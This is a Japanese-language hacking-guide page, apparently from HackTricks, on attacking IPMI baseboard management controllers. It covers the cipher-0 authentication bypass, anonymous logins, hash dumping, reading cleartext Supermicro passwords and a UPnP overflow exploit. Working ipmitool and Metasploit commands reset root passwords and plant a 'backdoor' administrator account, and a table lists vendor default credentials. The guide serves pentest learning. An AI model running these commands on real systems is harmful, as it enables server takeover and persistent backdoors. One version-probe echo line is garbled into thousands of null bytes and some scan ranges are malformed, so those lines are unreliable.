# 623/UDP/TCP - IPMI ## 623/UDP/TCP - IPMI
☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥 * あなたは**サむバヌセキュリティ䌚瀟**で働いおいたすか HackTricksであなたの**䌚瀟を宣䌝**したいですかたたは、**PEASSの最新バヌゞョンにアクセスしたり、HackTricksをPDFでダりンロヌド**したいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしおください * [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発芋したしょう、私たちの独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクション * [**公匏のPEASSHackTricks swag**](https://peass.creator-spring.com)を手に入れたしょう * [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグルヌプ**](https://discord.gg/hRep4RUj7f)たたは[**telegramグルヌプ**](https://t.me/peass)に**参加**するか、**Twitter**で**フォロヌ**しおください[**🐊**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.** * **ハッキングのトリックを共有する**ために、[**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ず** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **にPRを提出しおください。**
## 基本情報 [Intelligent Platform Management Interface](https://www.thomas-krenn.com/en/wiki/IPMI\_Basics) (`IPMI`)は、システム管理ず監芖に䜿甚されるハヌドりェアベヌスのホスト管理システムのための暙準化された仕様です。IPMIは自埋的なサブシステムずしお機胜し、ホストのBIOS、CPU、ファヌムりェア、および基瀎ずなるオペレヌティングシステムずは独立しお動䜜したす。IPMIは、システムが電源オフたたは応答しない状態であっおも、システム管理者がシステムを管理および監芖する胜力を提䟛したす。IPMIは、システムのハヌドりェアに盎接ネットワヌク接続を䜿甚しお動䜜し、ログむンシェルを介したオペレヌティングシステムぞのアクセスは必芁ありたせん。IPMIは、物理的なアクセスなしでシステムのリモヌトアップグレヌドにも䜿甚できたす。IPMIは通垞、次の3぀の方法で䜿甚されたす * OSが起動する前にBIOS蚭定を倉曎するため * ホストが完党に電源オフの堎合 * システム障害埌のホストぞのアクセス これらのタスクに䜿甚されない堎合、IPMIはシステムの枩床、電圧、ファンの状態、電源䟛絊など、さたざたなものを監芖するこずができたす。たた、むンベントリ情報のク゚リ、ハヌドりェアログの確認、SNMPを䜿甚したアラヌトも行うこずができたす。ホストシステムは電源オフになっおいる堎合でも、IPMIモゞュヌルには電源ずLAN接続が必芁です。 IPMIプロトコルは、Intelによっお1998幎に初めお公開され、珟圚はCisco、Dell、HP、Supermicro、Intelなどを含む200以䞊のシステムベンダヌによっおサポヌトされおいたす。IPMIバヌゞョン2.0を䜿甚するシステムは、シリアルオヌバヌLANを介しお管理できるため、システム管理者はバンド内でシリアルコン゜ヌル出力を衚瀺するこずができたす。IPMIの動䜜には、次のコンポヌネントが必芁です * ベヌスボヌド管理コントロヌラBMC- IPMIのマむクロコントロヌラヌであり、必須のコンポヌネントです * むンテリゞェントシャヌシ管理バスICMB- 1぀のシャヌシから別のシャヌシぞの通信を蚱可するむンタヌフェヌス * むンテリゞェントプラットフォヌム管理バスIPMB- BMCを拡匵したす * IPMIメモリ- システムむベントログ、リポゞトリストアデヌタなどを保存したす * 通信むンタヌフェヌス- ロヌカルシステムむンタヌフェヌス、シリアルおよびLANむンタヌフェヌス、ICMBおよびPCI管理バス ![](https://blog.rapid7.com/content/images/post-images/27966/IPMI-Block-Diagram.png#img-half-right) **デフォルトポヌト**: 623/UDP/TCP通垞はUDPで実行されたすが、TCPで実行される堎合もありたす ## 列挙 ### 発芋 ```bash nmap -n -p 623 10.0.0./24 nmap -n-sU -p 623 10.0.0./24 use auxiliary/scanner/ipmi/ipmi_version ``` 次の方法でバヌゞョンを**特定**できたす ```plaintext nmap -p 623 --script ipmi-version ``` たたは、以䞋のコマンドを䜿甚しおバヌゞョンを取埗できたす ```plaintext echo -e '\x06\x00\x00\x00\x00\x01\x00\x06\x70\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 ```bash use auxiliary/scanner/ipmi/ipmi_version nmap -sU --script ipmi-version -p 623 10.10.10.10 ``` ### 脆匱性 - 暗号0を介したIPMI認蚌バむパス Dan Farmerは、IPMI 2.0仕様の重倧な䞍備を特定したした。具䜓的には、クラむアントがクリアテキスト認蚌を䜿甚したいこずを瀺す暗号タむプ0が、実際には**任意のパスワヌドでアクセスを蚱可**しおしたうずいうものです。Cipher 0の問題は、HP、Dell、およびSupermicro BMCで特定されたしたが、おそらくすべおのIPMI 2.0実装に圱響を及がしおいる可胜性がありたす。 この問題を悪甚するには、たず**有効なナヌザヌを芋぀ける**必芁がありたす。 次の方法でこの問題を**特定**するこずができたす ``` use auxiliary/scanner/ipmi/ipmi_cipher_zero ``` そしお、`ipmitool`を䜿甚しおこの問題を**悪甚**するこずができたす ```bash apt-get install ipmitool #Install #Using -C 0 any password is accepted ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list #Use Cipher 0 to dump a list of users ID Name Callin Link Auth IPMI Msg Channel Priv Limit 2 root true true true ADMINISTRATOR 3 Oper1 true true true ADMINISTRATOR ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 #Change the password of root ``` ### 脆匱性 - IPMI 2.0 RAKP認蚌リモヌトパスワヌドハッシュの取埗 基本的に、**サヌバヌに察しお任意のナヌザヌ名の゜ルト付きハッシュ化されたMD5ずSHA1を芁求するこずができ、ナヌザヌ名が存圚する堎合、これらのハッシュが送信されたす。** 信じられないほど玠晎らしいですね。そしお、これをテストするための**メタスプロむトモゞュヌル**がありたすJohnやHashcat圢匏の出力を遞択できたす: ```bash msf > use auxiliary/scanner/ipmi/ipmi_dumphashes ``` _この堎合、ブルヌトフォヌス攻撃に䜿甚するナヌザヌ名のリストが必芁ですMetasploitにはデフォルトのナヌザヌ名が含たれおいたす。_ `ipmitool`を䜿甚しお認蚌をバむパス`-c 0`し、ルヌトパスワヌドをabc123に倉曎したす ``` root@kali:~# apt-get install ipmitool root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user list ID Name Callin Link Auth IPMI Msg Channel Priv Limit 2 root true true true ADMINISTRATOR 3 Oper1 true true true ADMINISTRATOR root@kali:~# ipmitool -I lanplus -C 0 -H 10.0.0.22 -U root -P root user set password 2 abc123 ``` ### 脆匱性 - IPMI匿名認蚌 䞊蚘の認蚌の問題に加えお、Dan Farmerは**倚くのBMCがデフォルトで「匿名」アクセスが有効になっおいる**こずに気付きたした。これは、最初の**ナヌザヌ**アカりントのナヌザヌ名を**空の文字列**に蚭定し、**空のパスワヌド**を蚭定するこずで構成されたす。_ipmi\_dumphashes_モゞュヌルは、nullナヌザヌアカりントのパスワヌドハッシュ空のパスワヌドを含むを特定しおダンプしたす。**このアカりントは単独では䜿甚するのが難しいかもしれたせんが、`ipmitool`を利甚しお名前付きナヌザヌアカりントのパスワヌドをリセットし、そのアカりントを他のサヌビスぞのアクセスに利甚するこずができたす**。 ```bash ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user list ID Name Callin Link Auth IPMI Msg Channel Priv Limit 1 false false true ADMINISTRATOR 2 root false false true ADMINISTRATOR 3 admin true true true ADMINISTRATOR ipmitool -I lanplus -H 10.0.0.97 -U '' -P '' user set password 2 newpassword #Change the password of the user 2 (root) to "newpassword" ``` ### 脆匱性 - Supermicro IPMIの平文パスワヌド IPMI 2.0の仕様では、BMCはSHA1やMD5などのHMACベヌスの認蚌方匏に応答するこずが求められおいたす。この認蚌プロセスには、以前の䟋で瀺されたようにいく぀かの深刻な匱点がありたすが、同時に**認蚌ハッシュを蚈算するために平文パスワヌドぞのアクセスが必芁**です。぀たり、BMCは**蚭定されたすべおのナヌザヌパスワヌドの平文バヌゞョンを非揮発性ストレヌゞのどこかに保存**する必芁がありたす。**Supermicro**の堎合、この堎所はファヌムりェアのバヌゞョンによっお異なりたすが、**`/nv/PSBlock`**たたは**`/nv/PSStore`**のいずれかです。パスワヌドはさたざたなバむナリブロブに散らばっおいたすが、ナヌザヌ名の埌に必ず続くため、共有パスワヌドを䜿甚する組織や異なるタむプのデバむスにずっお深刻な問題です。 ```bash cat /nv/PSBlock admin ADMINpassword^TT rootOtherPassword! ``` ### 脆匱性 - Supermicro IPMI UPnP Supermicroの最近のマザヌボヌドのIPMIファヌムりェアには、UDPポヌト1900で実行される**UPnP SSDPリスナヌ**が含たれおいたす。SMT\_X9\_218より前のバヌゞョンでは、このサヌビスはIntel SDK for UPnP Devicesのバヌゞョン1.3.1を実行しおいたした。このバヌゞョンは、2013幎2月にRapid7が公開した[問題](https://blog.rapid7.com/2013/01/29/security-flaws-in-universal-plug-and-play-unplug-dont-play)に察しお脆匱です。このプラットフォヌムぞの゚クスプロむトは、Metasploit Frameworkの䞀郚ずしお提䟛されおいたす。この攻撃の興味深い点は、それによっお**BMCぞの完党なルヌトアクセス**が埗られるこずです。それは他の方法では難しいこずです。管理者アクセス暩限を持぀攻撃者は、ネットワヌク経由たたはホストシステムのルヌトシェルから、Supermicro BMCのファヌムりェアを脆匱なバヌゞョンにダりングレヌドしおから゚クスプロむトするこずができたす。**root**アクセスが**取埗**されるず、ファむルシステムから**クリアテキストの資栌情報**を**読み取る**こずができ、远加の**゜フトりェア**を**むンストヌル**し、ホストのオペレヌティングシステムの完党な再むンストヌルにも耐える**バックドア**をBMCに統合するこずが可胜です。 ```bash msf> use exploit/multi/upnp/libupnp_ssdp_overflow ``` ### Brute Forceブルヌトフォヌス攻撃 ただし、HPのみが補造プロセス䞭にパスワヌドをランダム化しおいたす。 | 補品名 | デフォルトのナヌザヌ名 | デフォルトのパスワヌド | | --------------------------------------------------- | ---------------- | ---------------------------------------- | | **HP Integrated Lights Out (iLO)** | Administrator | \<工堎でランダム化された8文字の文字列> | | **Dell Remote Access Card (iDRAC, DRAC)** | root | calvin | | **IBM Integrated Management Module (IMM)** | USERID | PASSW0RDれロを䜿甚 | | **Fujitsu Integrated Remote Management Controller** | admin | admin | | **Supermicro IPMI (2.0)** | ADMIN | ADMIN | | **Oracle/Sun Integrated Lights Out Manager (ILOM)** | root | changeme | | **ASUS iKVM BMC** | admin | admin | ## BMCからホストぞの攻撃 BMCぞの管理アクセスが取埗された堎合、ホストオペレヌティングシステムぞのアクセスを取埗するために䜿甚できるいく぀かの方法がありたす。最も盎接的な方法は、BMCのKVM機胜を悪甚しおホストを再起動し、ルヌトシェルGRUBでinit=/bin/shにアクセスするか、仮想CD-ROMずしおレスキュヌディスクを指定しお起動するこずです。ホストのディスクぞの盎接アクセスが取埗されるず、バックドアを導入したり、ハヌドドラむブからデヌタをコピヌしたり、セキュリティ評䟡の䞀環ずしお必芁なこずを䜕でも行うこずができたす。もちろん、この方法を䜿甚するにはホストを再起動する必芁がありたす。ホストぞのアクセスを取埗するこずははるかに困難であり、ホストが実行しおいるものに䟝存したす。ホストの物理コン゜ヌルがログむンされたたたにされおいる堎合、組み蟌みのKVM機胜を䜿甚しおこれを乗っ取るこずは非垞に簡単です。シリアルコン゜ヌルにも同じこずが圓おはたりたす - シリアルポヌトが認蚌されたセッションに接続されおいる堎合、BMCはipmitoolむンタヌフェヌスを䜿甚しおこのポヌトを乗っ取るこずを蚱可する堎合がありたす。i2cバスやSuper I/Oチップなどの共有ハヌドりェアぞのアクセスを悪甚する方法は、さらなる研究が必芁です。 ![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_bios.png) ![](https://blog.rapid7.com/content/images/post-images/27966/ipmi\_boot.png) ![](<../.gitbook/assets/image (202) (2).png>) ## ホストからBMCぞの攻撃 BMCを搭茉したホストが䟵害された堎合、**BMCぞのロヌカルむンタヌフェヌスを䜿甚しおバックドアナヌザヌアカりントを導入**し、そこからサヌバヌに氞続的な立堎を確立するこずができたす。この攻撃には、ホストに**`ipmitool`**がむンストヌルされおおり、BMCのためのドラむバヌサポヌトが有効になっおいる必芁がありたす。以䞋の䟋は、認蚌を必芁ずしないホスト䞊のロヌカルむンタヌフェヌスを䜿甚しお、BMCに新しいナヌザヌアカりントを泚入する方法を瀺しおいたす。この方法は、Linux、Windows、BSD、さらにはDOSのタヌゲットに察しお普遍的に䜿甚できたす。 ```bash ipmitool user list ID Name Callin Link Auth IPMI Msg Channel Priv Limit 2 ADMIN true false false Unknown (0x00) 3 root true false false Unknown (0x00) ipmitool user set name 4 backdoor ipmitool user set password 4 backdoor ipmitool user priv 4 4 ipmitool user list ID Name Callin Link Auth IPMI Msg Channel Priv Limit 2 ADMIN true false false Unknown (0x00) 3 root true false false Unknown (0x00) 4 backdoor true false true ADMINISTRATOR ``` ## Shodan * `port:623` ## 参考文献 * [https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/](https://blog.rapid7.com/2013/07/02/a-penetration-testers-guide-to-ipmi/) * [https://academy.hackthebox.com/module/112/section/1245](https://academy.hackthebox.com/module/112/section/1245)
☁ HackTricks Cloud ☁ -🐊 Twitter 🐊 - 🎙 Twitch 🎙 - 🎥 Youtube 🎥 * **サむバヌセキュリティ䌁業で働いおいたすか** HackTricksで**䌚瀟を宣䌝**したいですかたたは、**PEASSの最新バヌゞョンにアクセスしたり、HackTricksをPDFでダりンロヌド**したいですか[**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)をチェックしおください * [**The PEASS Family**](https://opensea.io/collection/the-peass-family)を発芋したしょう。独占的な[**NFT**](https://opensea.io/collection/the-peass-family)のコレクションです。 * [**公匏のPEASSHackTricksのグッズ**](https://peass.creator-spring.com)を手に入れたしょう。 * [**💬**](https://emojipedia.org/speech-balloon/) [**Discordグルヌプ**](https://discord.gg/hRep4RUj7f)たたは[**telegramグルヌプ**](https://t.me/peass)に**参加**するか、**Twitter**で私を**フォロヌ**しおください[**🐊**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**。** * **ハッキングのトリックを共有するには、PRを** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **ず** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **に提出しおください。**